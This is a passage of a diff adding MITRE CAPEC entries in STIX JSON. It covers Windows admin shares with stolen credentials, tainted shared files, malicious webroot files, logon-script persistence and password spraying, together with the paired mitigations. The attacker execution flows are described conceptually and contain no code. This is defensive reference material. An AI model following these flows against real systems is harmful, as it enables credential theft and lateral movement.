"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8e80f453-8c74-45c3-ad17-5cceded60e65", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deny remote use of local admin credentials to log into domain systems.", + "id": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5d4dbec9-a56a-4a81-9a64-a9d70c3cdcac", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not allow accounts to be a local administrator on more than one system.", + "id": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c44dcaf3-84a3-4fc1-a9c4-3c1c06dbeac1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44f48a42-3c74-4fbb-885b-d16e52d1e21f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor system and domain logs for abnormal credential access.", + "id": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-560-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6871bf92-f743-4558-b1fd-ca894de9bb78", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ab6c4df3-7bf9-4fdd-8c2a-9055c0aea441", + "target_ref": "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary guesses or obtains (i.e. steals or purchases) legitimate Windows administrator credentials (e.g. userID/password) to access Windows Admin Shares on a local machine or within a Windows domain.", + "external_references": [ + { + "external_id": "CAPEC-561", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "description": "Remote Services:SMB/Windows Admin Shares", + "external_id": "T1021.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1021/002" + }, + { + "description": "Overview of problems that may occur when administrative shares are missing, 2017--03---13, Microsoft Corporation", + "external_id": "REF-577", + "source_name": "reference_from_CAPEC", + "url": "https://support.microsoft.com/en-us/help/842715/overview-of-problems-that-may-occur-when-administrative-shares-are-mis" + }, + { + "description": "Rob Smallridge, HAPT15 is alive and strong: An analysis of RoyalCli and RoyalDNS, 2018--03---10, NCC Group", + "external_id": "REF-578", + "source_name": "reference_from_CAPEC", + "url": 
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + }, + { + "description": "Assaf Dahan, Operation Cobalt Kitty: Cybereason Labs Analysis, 2017, CyberReason", + "external_id": "REF-579", + "source_name": "reference_from_CAPEC", + "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + } + ], + "id": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Windows Admin Shares with Stolen Credentials", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "APT32 has leveraged Windows' 
built-in Net utility to use Windows Administrative Shares to copy and execute remote malware. [REF-579]", + "In May 2017, APT15 laterally moved within a Windows domain via Windows Administrative Shares to copy files to and from compromised host systems. This further allowed for the remote execution of malware. [REF-578]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows administrator credentials: The adversary must obtain known Windows administrator credentials in order to access the administrative network shares.

  2. Techniques
    An adversary purchases breached Windows administrator credentials from the dark web.
    An adversary leverages a key logger or phishing attack to steal administrator credentials as they are provided.
    An adversary conducts a sniffing attack to steal Windows administrator credentials as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows administrator password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows administrator credentials.

Experiment

  1. Attempt domain authentication: Try each Windows administrator credential against the hidden network shares until the target grants access.

  2. Techniques
    Manually or automatically enter each administrator credential through the target's interface.

Exploit

  1. Malware Execution: An adversary can remotely execute malware within the administrative network shares to infect other systems within the domain.

  2. Data Exfiltration: The adversary can remotely obtain sensitive data contained within the administrative network shares.

", + "x_capec_extended_description": "\n Windows systems within the Windows NT family contain hidden network shares that are only accessible to system administrators. These shares allow administrators to remotely access all disk volumes on a network-connected system and further allow for files to be copied, written, and executed, along with other administrative actions. Example network shares include: C$, ADMIN$ and IPC$. If an adversary is able to obtain legitimate Windows credentials, the hidden shares can be accessed remotely, via server message block (SMB) or the Net utility, to transfer files and execute code. It is also possible for adversaries to utilize NTLM hashes to access administrator shares on systems with certain configuration and patch levels.\n ", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The target administrative share allows remote use of local admin credentials to log into domain systems.", + "The adversary possesses a list of known Windows administrator credentials that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Windows administrator credentials for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential, leveraging it is trivial." 
+ }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eecc445b-fbb2-4188-870d-159485c94ef0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c813ade-2f68-46ad-b0ff-b3aa1d6f16d0", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11eaef47-9b8a-4bb8-bf2f-63eb95d12037", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8e39cc3a-64c4-488e-84a3-e2613bdb1254", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f482b089-26b2-468c-8161-bd9eea7cfe4b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d97f821-8b04-46bf-a725-33db09a739da", + "target_ref": "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates the files in a shared location by adding malicious programs, scripts, or exploit code to valid content. 
Once a user opens the shared content, the tainted content is executed.", + "external_references": [ + { + "external_id": "CAPEC-562", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/562.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Taint shared content", + "external_id": "T1080", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1080" + } + ], + "id": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Modify Shared File", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Disallow shared content. Protect shared folders by minimizing users that have write access. 
Use utilities that mitigate exploitation like the Microsoft Enhanced Mitigation Experience Toolkit (EMET) to prevent exploits from being run.", + "id": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-562-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--48a3e4bb-b139-4cfd-ad9b-bcafd4087f57", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c8c48ad-29e9-48a7-803e-dd6994eed5fd", + "target_ref": "attack-pattern--9d076056-3719-4afc-94f4-5d16aaee50a3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversaries may add malicious content to a website through the open file share and then browse to that content with a web browser to cause the server to execute the content. 
The malicious content will typically run under the context and permissions of the web server process, often resulting in local system or administrative privileges depending on how the web server is configured.", + "external_references": [ + { + "external_id": "CAPEC-563", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/563.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + } + ], + "id": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Add Malicious File to Shared Webroot", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions on directories that are accessible through a web server. Disallow remote access to the web root. Disable execution on directories within the web root. 
Ensure that permissions of the web server process are only what is required by not using built-in accounts and instead create specific accounts to limit unnecessary access or permissions overlap across multiple systems.", + "id": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-563-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fac83968-b4fb-49f5-b904-487038f291fe", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fa8958ed-8fb1-4412-9a43-882a8093afba", + "target_ref": "attack-pattern--80604cc1-88b5-4e55-846e-01cfc67966b2", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Operating system allows logon scripts to be run whenever a specific user or users logon to a system. If adversaries can access these scripts, they may insert additional code into the logon script. This code can allow them to maintain persistence or move laterally within an enclave because it is executed every time the affected user or users logon to a computer. Modifying logon scripts can effectively bypass workstation and enclave firewalls. 
Depending on the access configuration of the logon scripts, either local credentials or a remote administrative account may be necessary.", + "external_references": [ + { + "external_id": "CAPEC-564", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/564.html" + }, + { + "external_id": "CWE-284", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html" + }, + { + "description": "Boot or Logon Initialization Scripts", + "external_id": "T1037", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1037" + }, + { + "description": "Create or Modify System Process: Launch Agent", + "external_id": "T1543.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/001" + }, + { + "description": "Create or Modify System Process: Launch Daemon", + "external_id": "T1543.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1543/004" + }, + { + "description": "Boot or Logon Autostart Execution", + "external_id": "T1547", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1547" + } + ], + "id": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Run Software at Logon", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Restrict write access to logon scripts to necessary administrators.", + "id": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-564-0", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b0065118-5899-4093-ad4e-1d2e77d85ff5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac6fb253-4318-4476-bd92-98025e9f081b", + "target_ref": "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n In a Password Spraying attack, an adversary tries a small list (e.g. 3-5) of common or expected passwords, often matching the target's complexity policy, against a known list of user accounts to gain valid credentials. The adversary tries a particular password for each user account, before moving onto the next password in the list. This approach assists the adversary in remaining undetected by avoiding rapid or frequent account lockouts. 
The adversary may then reattempt the process with additional passwords, once enough time has passed to prevent inducing a lockout.\n ", + "external_references": [ + { + "external_id": "CAPEC-565", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Spraying", + "external_id": "T1110.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/003" + }, + { + "description": "ACSC Releases Advisory on Password Spraying Attacks, 2019--08---08, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-565", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/current-activity/2019/08/08/acsc-releases-advisory-password-spraying-attacks" + }, + { + "description": "Andy Greenberg, A notorious Iranian hacking crew is targeting industrial control systems, 2019--11---23, Ars Technica", + "external_id": "REF-566", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2019/11/a-notorious-iranian-hacking-crew-is-targeting-industrial-control-systems/" + }, + { + 
"description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + } + ], + "id": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Spraying", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user selects the phrase \"Password123\" as their password, believing that it would be very difficult to guess. Password Spraying, leveraging a list of commonly used passwords, is used to crack this password and gain access to the account.", + "The Iranian hacker group APT33 (AKA Holmium, Refined Kitten, or Elfin) carried out numerous Password Spraying attacks in 2019. On average, APT33 targeted 2,000 organizations per month, with upwards of 10 million authentication attempts each day. The majority of these attacks targeted manufacturers, suppliers, or maintainers of industrial control system equipment." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target's password policy: Determine the password policies of the target system/application.

  2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).
  3. Select passwords: Pick the passwords to be used in the attack (e.g. commonly used passwords, passwords tailored to individual users, etc.)

  4. Techniques
    Select passwords based on common use or a particular user's additional details.
    Select passwords based on the target's password complexity policies.

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by information determined in the previous steps, try each password for all known user accounts until the target grants access.

  2. Techniques
    Manually or automatically enter the first password for each known user account through the target's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Iterate through the remaining passwords for each known user account.
", + "x_capec_extended_description": "\n Password Spraying attacks often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications. Successful execution of Password Spraying attacks usually lead to lateral movement within the target, which allows the adversary to impersonate the victim or execute any action that the victim is authorized to perform. If the password chosen by the user is commonly used or easily guessed, this attack will be successful (in the absence of other mitigations). This is a specific instance of the password brute forcing attack pattern.\n Password Spraying Attacks are similar to Dictionary-based Password Attacks (CAPEC-16) in that they both leverage precompiled lists (i.e. dictionaries) of username/password combinations to try against a system/application. The primary difference is that Password Spraying Attacks leverage a known list of user accounts and only try one password for each account before moving onto the next password. In contrast, Dictionary-based Password Attacks leverage unknown username/password combinations and are often executed offline against files containing hashed credentials, where inducing an account lockout is not a concern.\n Password Spraying Attacks are also similar to Credential Stuffing attacks (CAPEC-600), since both utilize known user accounts and often attack the same targets. Credential Stuffing attacks, however, leverage known username/password combinations, whereas Password Spraying attacks have no insight into known username/password pairs. 
If a Password Spraying attack succeeds, it may additionally lead to Credential Stuffing attacks on different targets.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts on the target system/application." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "Applicable password lists.", + "A password cracking tool or a custom script that leverages the password list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Password Spraying attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--883bf7e0-d6d7-4599-a405-4cf773ba06f2", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93ed0e66-1693-44b2-b416-bee8db1ad4c2", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63dc5428-39f8-4790-9341-12ee76d16b3c", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 
"course-of-action--36387909-c46a-4d0f-8954-bbc4c954c9a9", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--39894d0f-45fc-4d1e-ac83-029554eb758f", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8f274c3-95ed-4968-afdc-6a8a87a6fb19", + "target_ref": "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-566", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html" + } + ], + "id": "attack-pattern--f1b2ac67-1040-4927-bad6-17eab5d8e17c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-567", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/567.html" + } + ], + "id": 
